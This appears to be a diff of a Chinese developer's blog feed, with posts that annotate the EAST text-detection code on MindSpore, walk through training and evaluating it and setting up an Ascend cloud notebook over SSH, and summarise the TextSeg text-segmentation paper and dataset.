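最后那个 if np.sum(score_map) < 1 的小补丁,应该是为了防止整张图一个正样本都没有:前面 EastLossBlock 里要除以 self.sum(y_true_cls),全零会除零,于是随手把一个像素置 1。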

    extract_vertices()
def extract_vertices(lines):
    '''extract vertices info from txt lines
    Input:
        lines   : list of string info 输入是一个字符串列表 lines,其中每个字符串包含了一个文本区域的信息,包括顶点坐标和标签等
    Output:
        vertices: vertices of text regions <numpy.ndarray, (n,8)> 所有文本区域的顶点坐标
        labels  : 1->valid, 0->ignore, <numpy.ndarray, (n,)> 标签
    '''
    labels = []  # 存储最终的标签
    vertices = []  # 存储顶点信息
    for line in lines:
        # 通过 rstrip() 和 lstrip() 去除行尾换行符和行首 BOM(Byte Order Mark)等特殊字符,
        # 并使用 split() 将其切分,取前八个整数作为顶点坐标
        vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
        label = 0 if '###' in line else 1
        labels.append(label)
    # 返回顶点和标签的 numpy 数组
    return np.array(vertices), np.array(labels)
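ICDAR 2015 的标注每行形如 x1,y1,…,x4,y4,transcription,转写为 ### 的是忽略样本。随手验证一下(示例行是编的):

lines = ['377,117,463,117,465,130,378,130,Genaxis Theatre\n',
         '374,155,409,155,409,170,374,170,###\n']
vertices, labels = extract_vertices(lines)
print(vertices.shape)  # (2, 8)
print(labels)          # [1 0]:第二行含 '###',被标记为忽略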

    adjust_height()
def adjust_height(img, vertices, ratio=0.2):
    '''adjust height of image to aug data
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        ratio       : height changes in [0.8, 1.2]
    Output:
        img         : adjusted PIL Image
        new_vertices: adjusted vertices
    '''
    ratio_h = 1 + ratio * (np.random.rand() * 2 - 1)  # 随机生成高度缩放比例,范围 [0.8, 1.2]
    old_h = img.height
    # 根据输入的高度缩放比例 ratio_h,计算调整后的图像新高度 new_h:
    # 原始图像的高度 old_h 乘以缩放比例后,用 np.around()(NumPy 的四舍五入函数,默认精度为 0)取整
    new_h = int(np.around(old_h * ratio_h))
    img = img.resize((img.width, new_h), Image.BILINEAR)

    new_vertices = vertices.copy()
    if vertices.size > 0:
        new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
    # 返回调整后的图像和更新后的顶点坐标
    return img, new_vertices

    rotate_img()
def rotate_img(img, vertices, angle_range=10):
    '''rotate image [-10, 10] degree to aug data
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        angle_range : rotate range
    Output:
        img         : rotated PIL Image
        new_vertices: rotated vertices
    '''
    # 获得中心旋转点
    center_x = (img.width - 1) / 2
    center_y = (img.height - 1) / 2
    angle = angle_range * (np.random.rand() * 2 - 1)
    # 使用 BILINEAR 滤波器进行图像插值,以获得更好的旋转效果
    img = img.rotate(angle, Image.BILINEAR)
    # 定义一个大小为 vertices.shape 的全零 NumPy 数组 new_vertices,用于存储旋转后的顶点坐标
    new_vertices = np.zeros(vertices.shape)
    for i, vertice in enumerate(vertices):
        # 遍历每个文本区域的顶点坐标,调用 rotate_vertices() 计算旋转后的新坐标,然后将其保存到 new_vertices 中
        new_vertices[i, :] = rotate_vertices(
            vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
    return img, new_vertices
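上面用到的 rotate_vertices() 文中没有贴出,核心就是绕给定锚点做二维旋转变换;按这个思路写一个示意(非仓库原码):

import math
import numpy as np

def rotate_vertices(vertices, theta, anchor=None):
    # vertices: (8,) 的 [x1, y1, ..., x4, y4];theta: 旋转弧度;anchor: (2,1) 的旋转锚点
    v = vertices.reshape((4, 2)).T  # 转成 2 x 4:第一行是 x,第二行是 y
    if anchor is None:
        anchor = v[:, :1]
    rotate_mat = np.array([[math.cos(theta), -math.sin(theta)],
                           [math.sin(theta), math.cos(theta)]])
    res = np.dot(rotate_mat, v - anchor)  # 平移到锚点再旋转
    return (res + anchor).T.reshape(-1)   # 平移回去,摊平成 (8,)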

    crop_img()
def crop_img(img, vertices, labels, length):
    '''crop img patches to obtain batch and augment
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        labels      : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
        length      : length of cropped image region
    Output:
        region      : cropped image region
        new_vertices: new vertices in cropped region
    '''
    # 获取原始图像的高度 h 和宽度 w
    h, w = img.height, img.width
    # confirm the shortest side of image >= length
    # 如果其中较小的一边小于指定的裁剪长度,则使用 PIL 库提供的 resize() 方法将图像缩放到相应的大小
    if h >= w and w < length:
        img = img.resize((length, int(h * length / w)), Image.BILINEAR)
    elif h < w and h < length:
        img = img.resize((int(w * length / h), length), Image.BILINEAR)
    ratio_w = img.width / w
    ratio_h = img.height / h
    assert (ratio_w >= 1 and ratio_h >= 1)

    # 按缩放比例同步更新顶点坐标
    new_vertices = np.zeros(vertices.shape)
    if vertices.size > 0:
        new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
        new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

    # find random position
    # 生成随机的裁剪位置,检查裁剪区域是否与文本区域相交,避免将裁剪区域中的文本区域遮盖或截断
    remain_h = img.height - length
    remain_w = img.width - length
    flag = True
    cnt = 0
    while flag and cnt < 1000:
        # 若随机裁剪的位置与文本区域有交集,则继续生成新的随机位置,
        # 直到找到一个合适的位置或者超过最大尝试次数 1000 次为止
        cnt += 1
        start_w = int(np.random.rand() * remain_w)
        start_h = int(np.random.rand() * remain_h)
        flag = is_cross_text([start_w, start_h], length,
                             new_vertices[labels == 1, :])
    box = (start_w, start_h, start_w + length, start_h + length)
    # 使用 PIL 库提供的 crop() 方法从原始图像中截取指定大小的区域,并将其作为本函数的输出返回
    region = img.crop(box)
    if new_vertices.size == 0:
        # 如果不存在任何文本区域,则直接返回裁剪后的图像区域和空的新顶点坐标
        return region, new_vertices
    # 更新文本区域的顶点坐标:将裁剪区域左上角 (start_w, start_h) 作为新原点,
    # 计算相对于这个原点的顶点坐标,并将这个相对坐标赋值给 new_vertices
    new_vertices[:, [0, 2, 4, 6]] -= start_w
    new_vertices[:, [1, 3, 5, 7]] -= start_h
    return region, new_vertices

    eval.py

    先使用 argparse 设置一堆参数:

| name | type | default | help |
| --- | --- | --- | --- |
| --device_target | str | 'Ascend' | device where the code will be implemented. (Default: Ascend) |
| --device_num | int | 5 | 设备编号,如果只有 1 个设备的话,设成 5 不能跑,设成 0 能跑 |
| --test_img_path | str | './data/icdar2015/Test/images/' | 测试集地址 |
| --checkpoint_path | str |  | 模型地址 |
context.set_context(
    mode=context.GRAPH_MODE,  # 图模式
    device_target=args.device_target,  # 设备类型
    save_graphs=False,  # 是否保存计算图
    device_id=args.device_num)  # 设备编号

    main

    设置一下模型、数据集、保存路径、开跑!

if __name__ == '__main__':
    model_name = args.checkpoint_path
    test_img_path = args.test_img_path
    submit_path = './submit'
    eval_model(model_name, test_img_path, submit_path)

    eval_model()
def eval_model(name, img_path, submit, save_flag=True):
    '''
    name     : 模型的 checkpoint 文件路径
    img_path : 测试集图片所在的文件夹路径
    submit   : 输出结果保存的文件夹路径
    save_flag: 是否保存中间结果
    '''
    # 判断输出结果保存的目录是否存在,如果存在则删除该目录及其子目录,然后重新创建一个同名目录
    if os.path.exists(submit):
        shutil.rmtree(submit)
    os.mkdir(submit)
    # 构建 EAST 模型
    network = EAST()
    # 加载预训练权重参数
    param_dict = load_checkpoint(name)
    load_param_into_net(network, param_dict)
    # 设置模型为训练模式
    network.set_train(True)

    start_time = time.time()
    # 调用 detect_dataset() 对测试集图片进行检测,并将检测结果保存到指定的输出目录 submit 中
    detect_dataset(network, img_path, submit)
    os.chdir(submit)
    res = subprocess.getoutput('zip -q submit.zip *.txt')
    res = subprocess.getoutput('mv submit.zip ../')
    os.chdir('../')
    # 调用评估脚本 ./evaluate/script.py 来计算模型的性能指标,评估结果保存在字符串变量 res 中
    res = subprocess.getoutput(
        'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
    print(res)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time() - start_time))

    if not save_flag:
        # 如果 save_flag 为 False,则删除输出目录及其子目录(闻到了屎山的味道)
        shutil.rmtree(submit)

    detect.py

    detect_dataset()
def detect_dataset(model, test_img_path, submit_path):
    """
    detection on whole dataset, save .txt results in submit_path
    Input:
        model        : detection model 模型实例
        device       : gpu if gpu is available
        test_img_path: dataset path 测试图片所在文件夹的路径
        submit_path  : submit result for evaluation 提交结果保存路径
    """
    # 读取测试集中所有的图片,并按照文件名排序
    img_files = os.listdir(test_img_path)
    img_files = sorted([os.path.join(test_img_path, img_file)
                        for img_file in img_files])

    for i, img_file in enumerate(img_files):
        # 对于每一张图片,调用 detect() 函数进行文本检测,返回文本框的坐标信息,
        # 同时输出 log 信息提示检测进度
        print('evaluating {} image'.format(i), end='\r')
        boxes = detect(Image.open(img_file), model)
        seq = []
        if boxes is not None:
            # 如果检测结果不为空,则将框的坐标信息转换成符合要求的字符串序列并加入到列表 seq 中
            seq.extend([','.join([str(int(b))
                                  for b in box[:-1]]) + '\n' for box in boxes])
        # 将序列 seq 保存为与当前图片名称相同的 .txt 文件,并写入 submit_path 目录下
        with open(os.path.join(submit_path, 'res_' +
                               os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
            f.writelines(seq)
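这样 submit_path 里每张图对应一个 res_<图片名>.txt,一行一个框、格式为 x1,y1,…,x4,y4(box[:-1] 把第 9 列的置信度丢掉了),正好是 ICDAR 离线评估脚本要求的提交格式。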

    detect()
def detect(img, model):
    """detect text regions of img using model
    Input:
        img   : PIL Image
        model : detection model
        device: gpu if gpu is available
    Output:
        detected polys
    """
    # 将输入图片进行尺寸调整与相应的 ratio 变换,得到调整后的图片、高宽比例 ratio_h 和 ratio_w
    img, ratio_h, ratio_w = resize_img(img)
    # 利用模型对调整后的图片进行文字区域检测,得到概率图 score 和文本框参数 geo
    score, geo = model(load_pil(img))
    # 对概率图和文本框参数使用 MindSpore 的 Squeeze() 算子进行维度降低(由 4 维转为 3 维)
    score = P.Squeeze(0)(score)
    geo = P.Squeeze(0)(geo)
    # 从降维后的概率图和文本框参数中获取文本框坐标信息,即调用 get_boxes() 函数
    boxes = get_boxes(score.asnumpy(), geo.asnumpy())
    # 根据之前的高宽比例 ratio_h 和 ratio_w,换算出检测到的文本框在原始图片上的坐标信息,即调用 adjust_ratio() 函数
    return adjust_ratio(boxes, ratio_w, ratio_h)

    get_boxes()
def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
    """get boxes from feature map
    Input:
        score       : score map from model <numpy.ndarray, (1,row,col)> 概率图
        geo         : geo map from model <numpy.ndarray, (5,row,col)> 文本框参数
        score_thresh: threshold to segment score map 置信度阈值
        nms_thresh  : threshold in nms 非极大值抑制阈值
    Output:
        boxes       : final polys <numpy.ndarray, (n,9)>
    """
    # 对输入的 score 进行降维,即将其转化为二维数组
    score = score[0, :, :]
    # 在降维后的 score 数组中,找到大于 score_thresh 的点,并以 (r, c) 的格式记录下来,形成一个 n x 2 的矩阵 xy_text
    xy_text = np.argwhere(score > score_thresh)  # n x 2, format is [r, c]
    if xy_text.size == 0:
        return None

    # 按行号排序 xy_text,以保证靠前的点在结果中优先考虑
    xy_text = xy_text[np.argsort(xy_text[:, 0])]
    # 将 xy_text 中的坐标转化为 (x, y) 形式(数组按行 major 排列,所以列号是 x 坐标,行号是 y 坐标)
    valid_pos = xy_text[:, ::-1].copy()  # n x 2, [x, y]
    # 从降维后的 geo 数组中提取出与 xy_text 中相应位置点相关的文本框参数,形成 5 x n 的矩阵 valid_geo
    valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]]  # 5 x n
    # 利用 restore_polys() 将 valid_pos 和 valid_geo 还原为文本框的坐标点集 polys_restored,并得到对应的索引值 index
    polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
    if polys_restored.size == 0:
        return None

    # 将结果组织成 (n,9) 大小的数组:前 8 列为文本框四个顶点的坐标,第 9 列为该文本框的置信度(即所在 score map 中的值)
    boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
    boxes[:, :8] = polys_restored
    boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
    # 对候选框执行局部感知非极大值抑制(NMS),得到最终的文本框坐标信息 boxes
    boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
    return boxes

    adjust_ratio()

    根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息

def adjust_ratio(boxes, ratio_w, ratio_h):
    """refine boxes
    Input:
        boxes  : detected polys <numpy.ndarray, (n,9)>
        ratio_w: ratio of width
        ratio_h: ratio of height
    Output:
        refined boxes
    """
    if boxes is None or boxes.size == 0:
        return None
    boxes[:, [0, 2, 4, 6]] /= ratio_w
    boxes[:, [1, 3, 5, 7]] /= ratio_h
    return np.around(boxes)

    跑!

    1. 变更一个 mindspore 2.0 的镜像,太旧的 mindspore 会寄……

    png

2. EAST for Ascend - Gitee.com 把仓库整下来,最好整到 work/ 文件夹里,这样服务器重启过后数据还能保留。训练这玩意还需要:
    • Dataset: ICDAR 2015: Focused Scene Text,这个数据集,1000 张训练集,500 张测试集

    • The pretrained_path should be a checkpoint of vgg16 trained on Imagenet2012. vgg 在 Imagenet2012 里预训练过的模型,它还不给下载地址,让我找老半天,哼

      • MindSpore 官网 - 资源 - Hub 搜索 vgg16,找到 下载地址,下载 vgg16_ascend_v190_imagenet2012_official_cv_top1acc73.49_top5acc91.56.ckpt

        png

3. 调整仓库里的 parser 参数、数据集的位置和预训练模型的位置,使得路径对应一致。

    In this project, the file organization is recommended as below:

.
└─data
  └─icdar2015
      ├─Training            # Training set
      │   ├─image           # Images in training set
      │   └─groundTruth     # GT in training set
      └─Test                # Test set
          ├─image           # Images in test set
          └─groundTruth     # GT in test set

    png

4. 安装环境一条龙!requirements.txt 里面的玩意着实难装,还是手动装好了……
    source activate base  # 第一次进服务器激活需要 activate base
    python -c "import mindspore;mindspore.run_check()" # 查看 mindspore 版本
    conda create -n east --clone base # 克隆 base 环境
    conda activate east # 激活 east 环境
    pip install numpy
    pip install opencv-python
    pip install shapely
    pip install pillow
    pip install lanms-neo
    pip install --upgrade setuptools # 更新 setuptools
    pip install Polygon3 # 这个库很难装,可能需要更新 setuptools
    pip install onnxruntime
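装完可以先做个冒烟测试,确认几个难装的包都能 import(示意):

# 任何一个包没装好都会在对应的 import 处立刻报错
import cv2, shapely, lanms, Polygon, onnxruntime
import mindspore
mindspore.run_check()
print('env ok')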

    ​ 装好环境后可以保存一下镜像,这样下次重开服务器的时候就会保留之前安装好的环境:

    png

5. 切到仓库目录,开跑 train.py:
    cd /home/ma-user/work/east/
    python3 train.py

    png

    ​ 显示完超参数后,就开始 train 了,继续等呗。

    png

6. 训练时间从 14:27 到 18:41,就能炼出仙丹一枚:checkpoint_east-600_125.ckpt

    png

7. 设置一下 eval.py 的参数:
• --device_num:Ascend 设备编号(传给 set_context 的 device_id),因为我只租了 1 个,所以设为 0
    • --test_img_path 测试集路径,evaluate 时会读取这里面的图片
    • --checkpoint_path 模型的路径,把它设为刚刚炼好的仙丹的路径:outputs/2023-05-15_time_14_27_25/ckpt_0/checkpoint_east-600_125.ckpt

    png

8. The evaluation scripts are from ICDAR Offline evaluation and have been modified to run successfully with Python 3.7.1.

      从上面这个链接里下载 script_test_ch4_t1_e1-1577983151.zip,并放在 evaluate/中:

      png

9. 开跑 eval.py:

    python3 eval.py

    ​ 然后就能在 submit\ 里查看评估结果,和 ground truth 参考一下,能识别一点点东西。

    png

    ​ 返回出来的效果比它宣传的要差好多啊,呜呜呜……

    Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
    ]]>
    @@ -6883,7 +6883,7 @@ /posts/Server-%E4%B8%AD%E5%8E%9F%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83%EF%BC%88%E5%90%84%E7%A7%8D%E5%AF%84%EF%BC%89/ - 前言

    ]]>
    + 前言

    为了白嫖这个资源:中原人工智能计算中心云运营平台 (xckpjs.com),学!

    正文

    接服务器

    1. 登录:中原人工智能计算中心云运营平台 (xckpjs.com)

    png

2. 云资源-ModelArts 控制台-进入 HCS Online

    png

3. 开发环境-Notebook-创建

    png

4. 设置好名称,自定义镜像选择:mindspore-tensorflow-pytorch v1.3

    png

5. SSH 远程开发要打开,密钥对自己新建一个,点立即创建

    png

6. 创建好后会自动下载一个私钥KeyPair-9944.pem,还要你妥善保管,存到一个记得住的文件夹里

    png

    png

7. 回到创建 Notebook 的界面,刷新密钥对,选择刚刚创建的密钥对KeyPair-9944.pem,然后立即创建

    png

    png

    png

8. 等好了!

    png

9. 下载安装并打开 MobaXterm :https://en.softonic.com/download/moba/windows/post-download(这个网站好像要翻墙)

    png

10. Session - SSH,点击你创建的 Notebook 的名称查看详细信息

    png

11. 根据你创建的 Notebook 的参数 ssh://ma-user@authoring-ssh.cncentral231.xckpjs.com:31374 输入 SSH settings 中的参数:

    png

    • Basic SSH settings
  • Remote host * ,输入 authoring-ssh.cncentral231.xckpjs.com
  • Specify username 打勾,输入 ma-user
      • 端口号,输入 31374
    • Advanced SSH settings
      • Use private key 打勾,选择之前下载到的 KeyPair-9944.pem,然后 OK

    png

12. login as : ma-user,回车

    png

13. 吃饭,后面请教牛逼的伟哥

    png

14. 试一试:
    import torch_npu as torch

    torch.npu.is_available()
    True

    PyCharm

    配置

    1. 先整一个专业版的 PyCharm,谢谢小迷糊!

    png

2. 在 Pycharm 中随便打开一个项目(就你了,yolov5-5.0 ultralytics/yolov5 at v5.0 (github.com)),Tools-Deployment-Configuration:

    png

3. 点击 SSH configuration... 以设置 SSH configuration

    png

4. 根据你创建的 Notebook 的参数 ssh://ma-user@authoring-ssh.cncentral231.xckpjs.com:30376,设置参数:
    • Host: authoring-ssh.cncentral231.xckpjs.com
    • Username: ma-user
    • Authentication type: Key Pair
    • Private key file: 之前存的 KeyPair-9944.pem 的地址

    Test Connection 显示 Successfully connected! 即可。

    png

5. 在服务器中新建一个文件夹,用于存放项目文件,只有放在work文件夹里,下次再打开服务器时内容才不会丢失:

    /home/ma-user/work 目录下的数据会保存,其余目录下内容会被清理。如果需要保存开发环境,可以通过保存镜像的方式保留开发环境设置。

    png

6. 服务器中新建一个新的虚拟环境:yolov5
    conda create -n yolov5 python=3.7
    source activate yolov5
    which python

    linux 环境下的 which python 可以返回当前虚拟环境下的解释器位置:~/.conda/envs/yolov5/bin/python

7. 设置解释器:Pycharm 下 File-Settings-Project: yolov5-5.0-Add Interpreter,选择 Existing 和对应的 SSH Server 地址:

    png

8. 设置好解释器和对应的服务器目录:

    png

9. 此时服务器里就会同步 yolov5 这个项目了,等待同步完成

    png

    1. requirements.txt 里,删除 torch>=1.7.0torchvision>=0.8.1 这两行

    png

11. 在服务器中安装环境,这个服务器自带 1.8.1 版本的 pytorch,对应的是 0.9.1 的 torchvision,必须设定好版本,不然会寄:
    cd /home/ma-user/work/yolov5-5.0/
    pip install -r requirements.txt
    pip install torchvision==0.9.1
12. 在自己的 Notebook 中选择 更多-保存镜像,以在下次启动服务器时,配置的环境不丢失。

    png

    开跑(寄)

    1. 开跑 detect.py!喜提错误:ImportError: libGL.so.1: cannot open shared object file: No such file or directory,使用命令pip install opencv-python-headless填之。

    2. 开跑 detect.py!喜提错误:cv2.error: OpenCV(4.7.0) /io/opencv/modules/highgui/src/window.cpp:1272: error: (-2:Unspecified error) The function is not implemented. Rebuild the library with Windows, GTK+ 2.x or Cocoa support. If you are on Ubuntu or Debian, install libgtk2.0-dev and pkg-config, then re-run cmake or configure script in function ‘cvShowImage’,问 ChatGPT,说这个报错可能是由于 OpenCV 没有启用 GUI 支持导致的,于是我把 --view-img 关了,能跑了,但是没有识别结果,giao!

    png

    Algorithm migration documentation

    Migration and adaptation workflow

    png

    Has the Ascend platform already adapted the algorithm you need?

    For the latest ModelZoo, follow the live link: ModelZoo 查询及提问链接 (yuque.com)

    I. The model is already adapted to the Ascend platform

    1. The model is adapted to MindSpore

    Gitee issue link: Issues · MindSpore/mindspore - Gitee.com

    • MindSpore ModelZoo model library (models adapted to MindSpore)

    2. The model is adapted to the NPU

    Gitee issue link: Issues · Ascend/modelzoo - Gitee.com

    • Ascend ModelZoo model library (Gitee)

    • Ascend ModelZoo model library (official showcase)

    • Modelzoo-Pytorch model library

    • Modelzoo-Tensorflow model library

    • Modelzoo-yolo series model library

    II. The model is not yet adapted to the Ascend platform

    1. Migrate from a third-party framework to MindSpore

    2. Migrate a PyTorch algorithm to the NPU

    3. Migrate a TensorFlow algorithm to the NPU

    Data transfer

    "Notebook server data preparation": mainly about getting test scripts, datasets, third-party dependencies, and the like onto the notebook server

    • Download directly with Linux commands
      • e.g. via wget, git, and similar commands
    • Transfer locally prepared data to the notebook server
      • Smaller scripts or datasets can be uploaded straight through MobaXterm
      • Larger files (hundreds of GB) can go through OBS: first local to OBS, then OBS to the notebook server, as in the sketch below
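    A minimal MoXing sketch of the OBS route (moxing ships preinstalled in ModelArts notebooks; the bucket name and paths below are placeholders):

    import moxing as mox

    # local notebook -> OBS bucket
    mox.file.copy_parallel("/home/ma-user/work/dataset", "obs://my-bucket/dataset")
    # OBS bucket -> notebook server
    mox.file.copy_parallel("obs://my-bucket/dataset", "/home/ma-user/work/dataset")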

    Migration tools

    - "Migration tool: pytorch/tensorflow algorithms to the MindSpore framework": 迁移工具-x2mindspore (yuque.com)
    - "Migration tool: pytorch algorithms to Ascend": 迁移工具-Pytorch Gpu2Ascend 脚本迁移工具 (yuque.com)
    - "Migration tool: tensorflow algorithms to Ascend": 迁移工具-Pytorch Gpu2Ascend 脚本迁移工具 (yuque.com)

    1. Create a notebook server and log in
    2. Run the migration tool on your scripts from the command line
    3. Outputs
      • the migrated scripts
      • supported operator list: supported_api.csv
      • unsupported operator list: unsupported_api.csv
    4. Apply the suggested changes from unsupported_api.csv (a parsing sketch follows this list)
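    A small sketch for summarising the unsupported-operator report. The column names "op_name" and "suggestion" are assumptions; adjust them to whatever header row the real unsupported_api.csv carries:

    import csv

    with open("unsupported_api.csv", newline="", encoding="utf-8") as f:
        for row in csv.DictReader(f):
            # assumed columns; print each operator next to the tool's suggestion
            print(row.get("op_name"), "->", row.get("suggestion"))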

    Reference material roundup

    Migration practice (doomed)

1. Enter the migration tool's directory:

    cd /usr/local/Ascend/ascend-toolkit/latest/tools/x2mindspore

2. Set the project to migrate, /home/ma-user/work/yolov5-5.0/, and the output directory, /home/ma-user/work/yolov5-5.0-mindspore

    png

3. Run it!

    ./run_x2mindspore.sh -i /home/ma-user/work/yolov5-5.0/ -o /home/ma-user/work/yolov5-5.0-mindspore -f pytorch

    Rewarded with an error: ModuleNotFoundError: No module named 'libcst'. Plug it with pip install libcst.

4. Run it again!

    png

    Wait, wait, wait... until "X2MindSpore run success, welcome to the next use." appears, and then you can indeed proceed to the next use.

5. Download the migrated project back to the local machine:

    png

6. Set up the interpreter, then patch and patch and patch...

    You're supposed to apply the suggested fixes from the unsupported operator list unsupported_api.csv... emmmmm... maybe I'll just use something ready-made from now on.

    Running an off-the-shelf framework (doomed)

    Tutorial: Yolov5-PyTorch (hiascend.com)

    You again, then: YOLOv5-6.0 (supposedly only versions 6.0 and above support the NPU...)!

1. Download the project files Yolov5_for_PyTorch_v6.0 from built-in/PyTorch/Official/cv/object_detection/Yolov5_for_PyTorch_v6.0 · Ascend/modelzoo-GPL - 码云 - 开源中国 (gitee.com)

    png

2. Set up the interpreter

    png

3. Run detect.py! Rewarded with an error: AttributeError: module 'torch.npu' has no attribute 'is_available'. In utils/torch_utils, change import torch to import torch_npu as torch (sketched below).
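    A sketch of that edit, mirroring the blog's own fix rather than the official porting route: torch_npu exposes an npu namespace, so aliasing it keeps torch.npu.* call sites working, while a guarded fallback keeps the file importable on non-Ascend machines.

    try:
        import torch_npu as torch  # Ascend build: torch_npu carries the npu namespace
    except ImportError:
        import torch               # elsewhere, fall back to stock PyTorch

    on_npu = hasattr(torch, "npu") and torch.npu.is_available()
    print("NPU available:", on_npu)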

    Aaaargh, everything after that was a complete mess, aaaargh

    Running a framework that MindSpore supports

    Pick a favourite from models: Models of MindSpore (gitee.com). It's decided, it's you, EAST! models: Models of MindSpore - Gitee.com

    It actually didn't die! See the next blog post!

    ]]>
@@ -6937,7 +6937,7 @@ /posts/Paper-Rethinking%20Text%20Segmentation%EF%BC%9AA%20Novel%20Dataset%20and%20A%20Text-Specific%20Refinement%20Approach/ - Resources

    Notes

    Text segmentation is a prerequisite for many tasks, such as text style transfer and scene text removal.

    TextSeg

    The most recent public text segmentation challenge ran in 2013-2015, hosted by ICDAR. The only existing datasets are:

    • Total-Text
    • COCO_TS
    • MLT_S

    All of them contain only scene text, no artistic/designed text.

    There are far too few datasets! So we propose a new one, TextSeg:

    • 4024 images

      • 2646 training
      • 340 validation
      • 1038 test
    • Six types of annotation:

      • word

      • character

      • bounding polygons

      • masks

      • transcriptions

      • shadows, 3D effects, halos, etc. are annotated as well

    • What makes it stronger:

      • drawn from more varied sources, so more styles
      • more comprehensive annotation
      • more accurate masks

    TexRNet

    Early work segmented text by thresholding, which falls apart on scene text with complex colors and textures. Deep-learning approach: SMANet.

    We propose a new text segmentation network: TexRNet

    png

    • Adapts to the distinctive properties of text, such as non-convex boundaries and varied textures.
    • Backbone: DeeplabV3+ or HRNet
      • ResNet101-DeeplabV3+ and HRNetV2-W48 are milestone, state-of-the-art semantic segmentation models
    • Effective network modules: key features pooling and attention-based similarity checking
      • Key features pooling: learns text texture via cosine similarity
      • Attention-based similarity checking: an attention layer uses $v$ as keys and $x_f$ as queries, computing the query-key similarity $x_{att}$ via dot product and softmax: $x_{att}=\mathrm{Softmax}(v^T\cdot x_f),\ x_{att}\in \mathbb{R}^{c\times n}$ (a PyTorch sketch follows this list)
    • Introduces a trimap loss and a glyph discriminator loss
      • A boundary-focused loss function further sharpens text accuracy

        • $\mathcal L_{tri}=\mathrm{WCE}(x_{rfn},x_{gt},w_{tri})$, where $\mathrm{WCE}(x,y,w)=-\frac{\sum^{n}_{j=1}w_j\sum^{c}_{i=1}x_{i,j}\log(y_{i,j})}{\sum^{n}_{j=1}w_j}$
          • $w_{tri}$ is a binary map that is 1 on text boundaries and 0 elsewhere
          • $\mathrm{WCE}(x,y,w)$ is the cross-entropy between $x$ and $y$ weighted by the spatial map $w$
      • A classifier pretrained for character recognition with 37 classes: 26 letters, 10 digits, and misc

      • Final loss: $\mathcal L = \mathcal L_{sem} +\alpha\mathcal L_{rfn} +\beta\mathcal L_{tri} +\gamma\mathcal L_{dis}$
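    A minimal PyTorch sketch of those two pieces; shapes follow the note's spirit (v holds one pooled key vector per class, x_f the per-pixel features), not the repo's exact code:

    import torch
    import torch.nn.functional as F

    def attention_similarity(v, x_f):
        # v: (d, c), x_f: (d, n); x_att = Softmax(v^T . x_f) in R^{c x n},
        # i.e. each pixel's similarity to each class key
        return torch.softmax(v.T @ x_f, dim=0)

    def weighted_cross_entropy(logits, target, w):
        # WCE(x, y, w): per-pixel cross-entropy re-weighted by the spatial map w
        # logits: (n, c), target: (n,) class indices, w: (n,) e.g. the boundary map w_tri
        ce = F.cross_entropy(logits, target, reduction="none")  # (n,) per-pixel loss
        return (w * ce).sum() / w.sum().clamp_min(1e-8)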


    Experimental results (each cell is fgIoU / F-score):

    Method                      | TextSeg (Ours) | ICDAR13 FST | COCO_TS     | MLT_S       | Total-Text
    DeeplabV3+                  | 84.07/0.914    | 69.27/0.802 | 72.07/0.641 | 84.63/0.837 | 74.44/0.824
    HRNetV2-W48                 | 85.03/0.914    | 70.98/0.822 | 68.93/0.629 | 83.26/0.836 | 75.29/0.825
    HRNetV2-W48 + OCR           | 85.98/0.918    | 72.45/0.830 | 69.54/0.627 | 83.49/0.838 | 76.23/0.832
    Ours: TexRNet + DeeplabV3+  | 86.06/0.921    | 72.16/0.835 | 73.98/0.722 | 86.31/0.830 | 76.53/0.844
    Ours: TexRNet + HRNetV2-W48 | 86.84/0.924    | 73.38/0.850 | 72.39/0.720 | 86.09/0.865 | 78.47/0.848
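    For reference, the table's two metrics are straightforward to compute from binary masks; a small numpy helper (mine, not the repo's evaluation code):

    import numpy as np

    def fg_iou_fscore(pred, gt):
        # pred/gt: binary numpy masks; fgIoU and F-score over the text (foreground) class
        pred, gt = pred.astype(bool), gt.astype(bool)
        inter = np.logical_and(pred, gt).sum()
        iou = inter / max(np.logical_or(pred, gt).sum(), 1)
        prec = inter / max(pred.sum(), 1)
        rec = inter / max(gt.sum(), 1)
        f = 2 * prec * rec / max(prec + rec, 1e-8)
        return iou, f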

    Code

    TextSeg

    Our dataset (TextSeg) is for academic use only and may not be used in any commercial project or research. To download the data, send a request email to textseg.dataset@gmail.com and tell us which school you are affiliated with.

    And yet a download link still turns up online...: TextSeg 大规模文本检测及分割数据集 - 数据集下载 - 超神经 (hyper.ai)


    png

    • image.tar.gz contains the 4024 images.

    • annotation.tar.gz

      The labels matching the images. Three kinds of files:

      • [dataID]_anno.json contains all word- and character-level transcriptions plus bounding polygons.
      • [dataID]_mask.png contains all character masks. Character mask label values run from 1 to n; label 0 is background and 255 means ignore.
      • [dataID]_maskeff.png contains all character masks with effects.
      • Adobe_Research_License_TextSeg.txt is the license file.
    • semantic_label.tar.gz

      Contains all word-level (semantic-level) masks, namely:

      • [dataID]_maskfg.png: 0 background, 100 word, 200 word effect, 255 ignore. ([dataID]_maskfg.png can also be derived from [dataID]_mask.png and [dataID]_maskeff.png. See the decoding sketch after this list.)
